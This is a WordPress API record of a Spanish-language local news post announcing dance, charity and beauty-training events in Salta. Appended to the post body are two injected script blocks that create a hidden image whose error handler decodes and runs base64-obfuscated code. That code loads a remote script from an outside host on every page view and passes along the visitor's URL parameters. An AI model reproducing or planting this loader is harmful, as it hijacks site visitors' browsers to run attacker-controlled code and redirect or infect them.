{"id":4980,"date":"2025-03-26T13:21:54","date_gmt":"2025-03-26T16:21:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4980"},"modified":"2025-08-13T23:38:02","modified_gmt":"2025-08-14T02:38:02","slug":"baile-solidaridad-y-capacitaciones-en-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4980","title":{"rendered":"Baile, solidaridad y capacitaciones en la Usina Cultural"},"content":{"rendered":"\n<p><strong><em>Danza, solidaridad y capacitaci\u00f3n en est\u00e9tica se unen en un fin de semana de eventos en Salta. Habr\u00e1 actividades culturales, un congreso de belleza y una jornada solidaria.<\/em><\/strong><\/p>\n\n\n\n<p>Este fin de semana, Salta ser\u00e1 escenario de diversas actividades culturales, solidarias y formativas para todos los gustos. El s\u00e1bado 29 de marzo a partir de las 16:00 horas, el SUM del Anfiteatro ofrecer\u00e1 una pista abierta con ritmos latinos, tango y folklore, donde los asistentes podr\u00e1n disfrutar de la danza en sus distintas expresiones.<\/p>\n\n\n\n<p>Tambi\u00e9n el s\u00e1bado, en el mismo horario, se realizar\u00e1 el evento solidario \u00abSumemos m\u00e1s sonrisas\u00bb, que busca promover la actividad f\u00edsica y cultural mientras se recauda dinero para la compra de alimentos destinados al merendero del asentamiento San Javier. La entrada es libre y gratuita, con la opci\u00f3n de colaborar con un bono contribuci\u00f3n de $3000.<\/p>\n\n\n\n<p>El domingo 30 y lunes 31 de marzo, a partir de las 9:30 horas, el Teatro ser\u00e1 la sede del 2\u00ba Congreso y Capacitaci\u00f3n de U\u00f1as y Pesta\u00f1as, un evento dirigido a manicuristas y lashistas en formato demostrativo, sin pr\u00e1ctica para los asistentes. Adem\u00e1s, contar\u00e1 con un stand de venta de productos especializados. Las entradas pueden adquirirse a trav\u00e9s de la plataforma&nbsp;<a href=\"http:\/\/saltaticket.gob.ar\/\">http:\/\/saltaticket.gob.ar<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Danza, solidaridad y capacitaci\u00f3n en est\u00e9tica se unen en un fin de semana de eventos en Salta. Habr\u00e1 actividades culturales, un congreso de belleza y una jornada solidaria. Este fin de semana, Salta ser\u00e1 escenario de diversas actividades culturales, solidarias y formativas para todos los gustos. El s\u00e1bado 29 de marzo a partir de las [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4981,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,11],"tags":[],"class_list":{"0":"post-4980","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4980"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4980"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4980\/revisions"}],"predecessor-version":[{"id":6540,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4980\/revisions\/6540"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4981"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}